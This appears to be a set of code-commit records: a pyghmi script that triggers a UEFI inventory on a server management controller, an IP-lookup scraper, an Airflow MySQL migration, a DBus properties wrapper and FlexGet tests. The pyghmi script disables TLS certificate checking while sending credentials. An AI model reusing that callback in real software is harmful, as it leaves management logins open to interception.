c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
Add a utility to induce an inventoryimport pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
<commit_before><commit_msg>Add a utility to induce an inventory<commit_after>import pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
|
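For comparison, the raw sequence from the comment could also be sent through pyghmi's raw interface; this is a sketch of the same bytes (netfn 0x3a, command 0xc4), untested against hardware:

data = ([0x3, 0x0, 0x21, 0x1, 0x9d]
        + list(b'/v2/ibmc/uefi/force-inventory')
        + [0x11, 0x1])
c.xraw_command(netfn=0x3a, command=0xc4, data=data)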
b686bf04f64e1e907f6444233c6776458c02e120
|
whatismyip.py
|
whatismyip.py
|
#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
    soup = BeautifulSoup(r.text, 'html.parser')
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
Add script for checking your ip address
|
Add script for checking your ip address
|
Python
|
apache-2.0
|
MichaelAquilina/whatismyip
|
Add script for checking your ip address
|
#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
    soup = BeautifulSoup(r.text, 'html.parser')
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add script for checking your ip address<commit_after>
|
#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
    soup = BeautifulSoup(r.text, 'html.parser')
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
Add script for checking your ip address#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
    soup = BeautifulSoup(r.text, 'html.parser')
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add script for checking your ip address<commit_after>#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
    soup = BeautifulSoup(r.text, 'html.parser')
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
|
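Worth noting: scraping the page is brittle (the 'the-ip' markup can change), so a plain-text service is a common fallback; icanhazip.com is one such service:

import requests

def my_ip():
    # The service returns the caller's public IP as bare text.
    return requests.get('https://icanhazip.com').text.strip()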
8a2d24856ba86dc807d91905fedc9af7faca99be
|
airflow/migrations/versions/d2ae31099d61_increase_text_size_for_mysql.py
|
airflow/migrations/versions/d2ae31099d61_increase_text_size_for_mysql.py
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
Increase text size for var field in variables for MySQL
|
[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text
|
Python
|
apache-2.0
|
subodhchhabra/airflow,Fokko/incubator-airflow,criccomini/airflow,gtoonstra/airflow,hgrif/incubator-airflow,apache/airflow,jfantom/incubator-airflow,zack3241/incubator-airflow,r39132/airflow,Twistbioscience/incubator-airflow,sergiohgz/incubator-airflow,Acehaidrey/incubator-airflow,CloverHealth/airflow,yk5/incubator-airflow,apache/airflow,nathanielvarona/airflow,spektom/incubator-airflow,apache/incubator-airflow,mrkm4ntr/incubator-airflow,apache/incubator-airflow,Acehaidrey/incubator-airflow,gtoonstra/airflow,janczak10/incubator-airflow,gilt/incubator-airflow,sid88in/incubator-airflow,CloverHealth/airflow,danielvdende/incubator-airflow,spektom/incubator-airflow,yati-sagade/incubator-airflow,Tagar/incubator-airflow,apache/airflow,danielvdende/incubator-airflow,OpringaoDoTurno/airflow,skudriashev/incubator-airflow,nathanielvarona/airflow,mistercrunch/airflow,jhsenjaliya/incubator-airflow,owlabs/incubator-airflow,mtagle/airflow,sekikn/incubator-airflow,Twistbioscience/incubator-airflow,cfei18/incubator-airflow,jhsenjaliya/incubator-airflow,sergiohgz/incubator-airflow,cjqian/incubator-airflow,RealImpactAnalytics/airflow,andyxhadji/incubator-airflow,malmiron/incubator-airflow,cfei18/incubator-airflow,spektom/incubator-airflow,Twistbioscience/incubator-airflow,jgao54/airflow,airbnb/airflow,sergiohgz/incubator-airflow,MortalViews/incubator-airflow,KL-WLCR/incubator-airflow,OpringaoDoTurno/airflow,zack3241/incubator-airflow,wolfier/incubator-airflow,CloverHealth/airflow,subodhchhabra/airflow,lyft/incubator-airflow,mtagle/airflow,mrkm4ntr/incubator-airflow,adamhaney/airflow,sergiohgz/incubator-airflow,r39132/airflow,jfantom/incubator-airflow,bolkedebruin/airflow,lyft/incubator-airflow,adamhaney/airflow,CloverHealth/airflow,danielvdende/incubator-airflow,KL-WLCR/incubator-airflow,ProstoMaxim/incubator-airflow,jhsenjaliya/incubator-airflow,apache/incubator-airflow,subodhchhabra/airflow,subodhchhabra/airflow,Twistbioscience/incubator-airflow,Acehaidrey/incubator-airflow,sid88in/incubator-airflow,r39132/airflow,malmiron/incubator-airflow,sid88in/incubator-airflow,ProstoMaxim/incubator-airflow,skudriashev/incubator-airflow,lyft/incubator-airflow,mrares/incubator-airflow,gtoonstra/airflow,wileeam/airflow,bolkedebruin/airflow,nathanielvarona/airflow,DinoCow/airflow,apache/airflow,edgarRd/incubator-airflow,Tagar/incubator-airflow,wolfier/incubator-airflow,artwr/airflow,wooga/airflow,jgao54/airflow,zack3241/incubator-airflow,yati-sagade/incubator-airflow,fenglu-g/incubator-airflow,OpringaoDoTurno/airflow,mistercrunch/airflow,yk5/incubator-airflow,owlabs/incubator-airflow,janczak10/incubator-airflow,airbnb/airflow,cjqian/incubator-airflow,Tagar/incubator-airflow,Acehaidrey/incubator-airflow,cfei18/incubator-airflow,OpringaoDoTurno/airflow,yati-sagade/incubator-airflow,akosel/incubator-airflow,wndhydrnt/airflow,DinoCow/airflow,mistercrunch/airflow,adamhaney/airflow,apache/airflow,nathanielvarona/airflow,danielvdende/incubator-airflow,akosel/incubator-airflow,mtagle/airflow,ProstoMaxim/incubator-airflow,jgao54/airflow,wileeam/airflow,mrares/incubator-airflow,edgarRd/incubator-airflow,andyxhadji/incubator-airflow,hgrif/incubator-airflow,wooga/airflow,adamhaney/airflow,skudriashev/incubator-airflow,mtagle/airflow,criccomini/airflow,dhuang/incubator-airflow,wndhydrnt/airflow,cfei18/incubator-airflow,bolkedebruin/airflow,KL-WLCR/incubator-airflow,lxneng/incubator-airflow,janczak10/incubator-airflow,yati-sagade/incubator-airflow,akosel/incubator-airflow,gtoonstra/airflow,Fokko/incubator-airflow,gilt/incubator-airflow,
artwr/airflow,dhuang/incubator-airflow,DinoCow/airflow,janczak10/incubator-airflow,fenglu-g/incubator-airflow,criccomini/airflow,Acehaidrey/incubator-airflow,RealImpactAnalytics/airflow,lyft/incubator-airflow,ProstoMaxim/incubator-airflow,cjqian/incubator-airflow,bolkedebruin/airflow,mrares/incubator-airflow,nathanielvarona/airflow,lxneng/incubator-airflow,yk5/incubator-airflow,wooga/airflow,wileeam/airflow,Fokko/incubator-airflow,r39132/airflow,malmiron/incubator-airflow,fenglu-g/incubator-airflow,sekikn/incubator-airflow,MortalViews/incubator-airflow,fenglu-g/incubator-airflow,wooga/airflow,sid88in/incubator-airflow,sekikn/incubator-airflow,wolfier/incubator-airflow,cfei18/incubator-airflow,gilt/incubator-airflow,apache/airflow,edgarRd/incubator-airflow,andyxhadji/incubator-airflow,wolfier/incubator-airflow,yk5/incubator-airflow,criccomini/airflow,DinoCow/airflow,Acehaidrey/incubator-airflow,danielvdende/incubator-airflow,zack3241/incubator-airflow,mrares/incubator-airflow,RealImpactAnalytics/airflow,dhuang/incubator-airflow,danielvdende/incubator-airflow,apache/incubator-airflow,cjqian/incubator-airflow,Fokko/incubator-airflow,jhsenjaliya/incubator-airflow,wndhydrnt/airflow,jfantom/incubator-airflow,malmiron/incubator-airflow,hgrif/incubator-airflow,edgarRd/incubator-airflow,KL-WLCR/incubator-airflow,spektom/incubator-airflow,dhuang/incubator-airflow,sekikn/incubator-airflow,wileeam/airflow,airbnb/airflow,artwr/airflow,airbnb/airflow,nathanielvarona/airflow,bolkedebruin/airflow,cfei18/incubator-airflow,lxneng/incubator-airflow,MortalViews/incubator-airflow,skudriashev/incubator-airflow,jgao54/airflow,andyxhadji/incubator-airflow,wndhydrnt/airflow,MortalViews/incubator-airflow,akosel/incubator-airflow,jfantom/incubator-airflow,Tagar/incubator-airflow,gilt/incubator-airflow,mistercrunch/airflow,artwr/airflow,owlabs/incubator-airflow,mrkm4ntr/incubator-airflow,lxneng/incubator-airflow,RealImpactAnalytics/airflow,hgrif/incubator-airflow,mrkm4ntr/incubator-airflow,owlabs/incubator-airflow
|
[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
<commit_before><commit_msg>[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text<commit_after>
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
<commit_before><commit_msg>[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text<commit_after>#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
|
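An alternative to string-matching the URL is asking the live connection for its dialect; a sketch of a helper that upgrade()/downgrade() could branch on:

from alembic import op

def _is_mysql():
    # Inspect the bound connection's dialect instead of parsing sqlalchemy.url.
    return op.get_bind().dialect.name == 'mysql'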
e348c4620f6de3d70c0b7d71afcb00727339bfd4
|
src/cli/_dbus/_properties.py
|
src/cli/_dbus/_properties.py
|
"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
Add a class for the DBus.Properties interface.
|
Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com>
|
Python
|
apache-2.0
|
stratis-storage/stratis-cli,stratis-storage/stratis-cli
|
Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com>
|
"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
<commit_before><commit_msg>Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com><commit_after>
|
"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com>"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
<commit_before><commit_msg>Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com><commit_after>"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
|
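A sketch of wrapping a dbus-python proxy with the class above; the bus name, object path, and interface name are placeholders:

import dbus

bus = dbus.SystemBus()
proxy = bus.get_object('org.example.Service', '/org/example/Object')
props = Properties(proxy)
print(props.GetAll('org.example.Interface'))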
0ab3ee0394af8aafe5d3815456ae2bc599c814b6
|
tests/test_parsingapi.py
|
tests/test_parsingapi.py
|
from __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
Add some tests to validate modular parsing api
|
Add some tests to validate modular parsing api
|
Python
|
mit
|
Danfocus/Flexget,ianstalk/Flexget,Flexget/Flexget,poulpito/Flexget,grrr2/Flexget,antivirtel/Flexget,oxc/Flexget,camon/Flexget,poulpito/Flexget,ianstalk/Flexget,OmgOhnoes/Flexget,ratoaq2/Flexget,crawln45/Flexget,vfrc2/Flexget,ZefQ/Flexget,v17al/Flexget,jacobmetrick/Flexget,ratoaq2/Flexget,sean797/Flexget,thalamus/Flexget,ibrahimkarahan/Flexget,offbyone/Flexget,JorisDeRieck/Flexget,malkavi/Flexget,patsissons/Flexget,tvcsantos/Flexget,tarzasai/Flexget,qvazzler/Flexget,gazpachoking/Flexget,JorisDeRieck/Flexget,tsnoam/Flexget,grrr2/Flexget,spencerjanssen/Flexget,cvium/Flexget,Danfocus/Flexget,JorisDeRieck/Flexget,oxc/Flexget,jawilson/Flexget,malkavi/Flexget,offbyone/Flexget,LynxyssCZ/Flexget,patsissons/Flexget,tvcsantos/Flexget,cvium/Flexget,ZefQ/Flexget,malkavi/Flexget,crawln45/Flexget,Flexget/Flexget,ianstalk/Flexget,ibrahimkarahan/Flexget,thalamus/Flexget,dsemi/Flexget,dsemi/Flexget,tarzasai/Flexget,sean797/Flexget,LynxyssCZ/Flexget,offbyone/Flexget,drwyrm/Flexget,qvazzler/Flexget,vfrc2/Flexget,Danfocus/Flexget,antivirtel/Flexget,crawln45/Flexget,LynxyssCZ/Flexget,crawln45/Flexget,qk4l/Flexget,jacobmetrick/Flexget,tarzasai/Flexget,antivirtel/Flexget,thalamus/Flexget,Flexget/Flexget,tobinjt/Flexget,tobinjt/Flexget,xfouloux/Flexget,drwyrm/Flexget,spencerjanssen/Flexget,xfouloux/Flexget,cvium/Flexget,qk4l/Flexget,qvazzler/Flexget,tobinjt/Flexget,OmgOhnoes/Flexget,gazpachoking/Flexget,jawilson/Flexget,LynxyssCZ/Flexget,lildadou/Flexget,lildadou/Flexget,malkavi/Flexget,dsemi/Flexget,poulpito/Flexget,OmgOhnoes/Flexget,spencerjanssen/Flexget,jacobmetrick/Flexget,jawilson/Flexget,vfrc2/Flexget,tsnoam/Flexget,Flexget/Flexget,JorisDeRieck/Flexget,jawilson/Flexget,patsissons/Flexget,ratoaq2/Flexget,xfouloux/Flexget,drwyrm/Flexget,tobinjt/Flexget,grrr2/Flexget,ibrahimkarahan/Flexget,v17al/Flexget,sean797/Flexget,ZefQ/Flexget,oxc/Flexget,Danfocus/Flexget,Pretagonist/Flexget,qk4l/Flexget,lildadou/Flexget,camon/Flexget,tsnoam/Flexget,Pretagonist/Flexget,Pretagonist/Flexget,v17al/Flexget
|
Add some tests to validate modular parsing api
|
from __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
<commit_before><commit_msg>Add some tests to validate modular parsing api<commit_after>
|
from __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
Add some tests to validate modular parsing apifrom __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
<commit_before><commit_msg>Add some tests to validate modular parsing api<commit_after>from __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
|
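The convention these tests enforce, shown as a hypothetical plugin skeleton: a plugin registered in the movie_parser group must expose a matching parse_movie method.

class MyMovieParser(object):
    # Hypothetical plugin; registration with group='movie_parser' is assumed
    # to happen through FlexGet's usual plugin registration machinery.
    def parse_movie(self, data, **kwargs):
        raise NotImplementedError('real parsing logic goes here')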
a0bb9f02a3aa5e58cca3760ef219d170db853864
|
ModelHandler/TestModels.py
|
ModelHandler/TestModels.py
|
import DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops
|
